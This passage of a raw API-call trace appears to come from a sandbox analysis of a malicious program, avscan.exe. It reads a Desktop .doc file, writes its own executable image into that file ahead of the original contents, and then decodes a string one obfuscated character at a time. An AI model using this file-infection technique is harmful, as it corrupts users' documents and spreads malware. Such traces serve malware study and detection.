[4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0182.400] FileSystemObject:IDispatch:Invoke (in: This=0xf22cdc, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\a0jrdmcvv1habm5.doc"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0182.401] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0182.402] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="doc", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0182.402] CharUpperBuffW (in: lpsz="doc", cchLength=0x4 | out: lpsz="DOC") returned 0x4 [0182.402] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0182.403] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 0 [0182.403] GetTickCount () returned 0x1d1a524 [0182.403] GetTickCount () returned 0x1d1a524 [0182.403] GetTickCount () returned 0x1d1a524 [0182.403] GetTickCount () returned 0x1d1a524 [0182.404] IsWindowVisible (hWnd=0x103b8) returned 0 [0182.404] Sleep (dwMilliseconds=0x0) [0182.445] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22cdc, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0182.445] FileSystemObject:IDispatch:Invoke (in: This=0xf22cdc, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\a0jrdmcvv1habm5.doc"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0182.446] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0182.447] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="doc", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0182.447] CharUpperBuffW (in: lpsz="doc", cchLength=0x4 | out: lpsz="DOC") returned 0x4 [0182.447] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x1 [0182.448] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22cdc, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0182.448] FileSystemObject:IDispatch:Invoke (in: This=0xf22cdc, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\a0jrdmcvv1habm5.doc"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0182.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc", cchWideChar=-1, lpMultiByteStr=0x28f46c, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc", lpUsedDefaultChar=0x0) returned 47 [0182.450] GetFullPathNameA (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc", nBufferLength=0x104, lpBuffer=0x28f5a0, lpFilePart=0x28f464 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc", lpFilePart=0x28f464*="A0jRdmcvV1haBm5.doc") returned 0x2e [0182.450] SetFileAttributesA (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc", dwFileAttributes=0x80) returned 1 [0182.456] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22cdc, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0182.456] FileSystemObject:IDispatch:Invoke (in: This=0xf22cdc, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\a0jrdmcvv1habm5.doc"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0182.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc", cchWideChar=-1, lpMultiByteStr=0x28f458, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc", lpUsedDefaultChar=0x0) returned 47 [0182.464] GetFullPathNameA (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc", nBufferLength=0x104, lpBuffer=0x28f588, lpFilePart=0x28f450 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc", lpFilePart=0x28f450*="A0jRdmcvV1haBm5.doc") returned 0x2e [0182.465] CreateFileA (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\a0jrdmcvv1habm5.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f548, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0182.465] GetFileType (hFile=0x160) returned 0x1 [0182.465] IMalloc:Alloc (This=0x76da66bc, cb=0x6b) returned 0x1151450 [0182.466] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0182.466] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x156a4 [0182.466] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0182.478] IMalloc:Alloc (This=0x76da66bc, cb=0x2ad34) returned 0x1196a50 [0182.480] ReadFile (in: hFile=0x160, lpBuffer=0x1196a50, nNumberOfBytesToRead=0x1569a, lpNumberOfBytesRead=0x28f5e8, lpOverlapped=0x0 | out: lpBuffer=0x1196a50*, lpNumberOfBytesRead=0x28f5e8*=0x1569a, lpOverlapped=0x0) returned 1 [0182.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ÐÏ\x11ࡱ\x1aá", cbMultiByte=87706, lpWideCharStr=0x116bd0c, cchWideChar=87706 | out: lpWideCharStr="ÐÏ\x11ࡱ\x1aá") returned 87706 [0182.486] IMalloc:Free (This=0x76da66bc, pv=0x1196a50) [0182.486] CloseHandle (hObject=0x160) returned 1 [0182.487] IMalloc:Free (This=0x76da66bc, pv=0x1151450) [0182.487] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f514, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0182.487] lstrcpynA (in: lpString1=0x28f400, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", iMaxLength=260 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0182.487] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 47 [0182.487] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x30) returned 0x10ebcd0 [0182.487] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x30) returned 0x10ebd08 [0182.487] lstrcpyA (in: lpString1=0x10ebcd0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0182.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cbMultiByte=-1, lpWideCharStr=0x1168d8c, cchWideChar=37 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 37 [0182.488] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebd40 | out: hHeap=0x10d0000) returned 1 [0182.488] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f514, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0182.488] lstrcpynA (in: lpString1=0x28f400, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", iMaxLength=260 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0182.488] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 47 [0182.488] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x30) returned 0x10ebcd0 [0182.488] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x30) returned 0x10ebd08 [0182.488] lstrcpyA (in: lpString1=0x10ebcd0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0182.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="avscan", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=7 | out: lpWideCharStr="avscan") returned 7 [0182.489] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebd40 | out: hHeap=0x10d0000) returned 1 [0182.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", cchWideChar=-1, lpMultiByteStr=0x28f458, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpUsedDefaultChar=0x0) returned 48 [0182.541] GetFullPathNameA (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", nBufferLength=0x104, lpBuffer=0x28f588, lpFilePart=0x28f450 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpFilePart=0x28f450*="avscan.exe") returned 0x2f [0182.541] CreateFileA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f548, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0182.541] GetFileType (hFile=0x160) returned 0x1 [0182.542] IMalloc:Alloc (This=0x76da66bc, cb=0x6c) returned 0x1151450 [0182.543] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0182.543] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1442557 [0182.543] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.264] IMalloc:Alloc (This=0x76da66bc, cb=0x2884a9a) returned 0x63b0020 [0185.267] ReadFile (in: hFile=0x160, lpBuffer=0x63b0020, nNumberOfBytesToRead=0x144254d, lpNumberOfBytesRead=0x28f5e8, lpOverlapped=0x0 | out: lpBuffer=0x63b0020*, lpNumberOfBytesRead=0x28f5e8*=0x144254d, lpOverlapped=0x0) returned 1 [0188.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MZ\x90", cbMultiByte=21243213, lpWideCharStr=0x3b20024, cchWideChar=21243213 | out: lpWideCharStr="MZ\x90") returned 21243213 [0188.627] IMalloc:Free (This=0x76da66bc, pv=0x63b0020) [0189.463] CloseHandle (hObject=0x160) returned 1 [0189.463] IMalloc:Free (This=0x76da66bc, pv=0x1151450) [0189.464] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22cdc, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0189.464] FileSystemObject:IDispatch:Invoke (in: This=0xf22cdc, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\a0jrdmcvv1habm5.doc"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0189.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc", cchWideChar=-1, lpMultiByteStr=0x28f458, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc", lpUsedDefaultChar=0x0) returned 47 [0189.466] GetFullPathNameA (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc", nBufferLength=0x104, lpBuffer=0x28f588, lpFilePart=0x28f450 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc", lpFilePart=0x28f450*="A0jRdmcvV1haBm5.doc") returned 0x2e [0189.467] CreateFileA (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\a0jrdmcvv1habm5.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x28f548, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0189.467] GetFileType (hFile=0x160) returned 0x1 [0189.467] IMalloc:Alloc (This=0x76da66bc, cb=0x6b) returned 0x1151450 [0189.468] IMalloc:Alloc (This=0x76da66bc, cb=0x2884a9a) returned 0x63b0020 [0189.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MZ\x90", cchWideChar=21243213, lpMultiByteStr=0x63b0020, cbMultiByte=42486426, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MZ\x90", lpUsedDefaultChar=0x0) returned 21243213 [0191.264] WriteFile (in: hFile=0x160, lpBuffer=0x63b0020*, nNumberOfBytesToWrite=0x144254d, lpNumberOfBytesWritten=0x28f1e0, lpOverlapped=0x0 | out: lpBuffer=0x63b0020*, lpNumberOfBytesWritten=0x28f1e0*=0x144254d, lpOverlapped=0x0) returned 1 [0197.280] IMalloc:Free (This=0x76da66bc, pv=0x63b0020) [0197.996] IMalloc:Alloc (This=0x76da66bc, cb=0x2ad34) returned 0x1196a50 [0197.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ÐÏ\x11ࡱ\x1aá", cchWideChar=87706, lpMultiByteStr=0x1196a50, cbMultiByte=175412, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ÐÏ\x11ࡱ\x1aá", lpUsedDefaultChar=0x0) returned 87706 [0197.997] WriteFile (in: hFile=0x160, lpBuffer=0x1196a50*, nNumberOfBytesToWrite=0x1569a, lpNumberOfBytesWritten=0x28f1e0, lpOverlapped=0x0 | out: lpBuffer=0x1196a50*, lpNumberOfBytesWritten=0x28f1e0*=0x1569a, lpOverlapped=0x0) returned 1 [0198.000] IMalloc:Free (This=0x76da66bc, pv=0x1196a50) [0198.000] CloseHandle (hObject=0x160) returned 1 [0201.419] IMalloc:Free (This=0x76da66bc, pv=0x1151450) [0201.420] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 1 [0201.420] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x1, lParam=0x28f54c) returned 0x0 [0201.421] IsWindow (hWnd=0x103bc) returned 1 [0201.421] GetWindowLongA (hWnd=0x103bc, nIndex=-16) returned 1140916224 [0201.421] IsIconic (hWnd=0x103b8) returned 0 [0201.421] GetParent (hWnd=0x103bc) returned 0x103b8 [0201.421] TranslateMessage (lpMsg=0x28f5e8) returned 0 [0201.421] DispatchMessageA (lpMsg=0x28f5e8) returned 0x0 [0201.421] KillTimer (hWnd=0x103bc, uIDEvent=0x103bc) returned 1 [0201.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.423] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0201.423] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.424] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0201.424] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.425] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0201.425] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.425] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0201.426] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 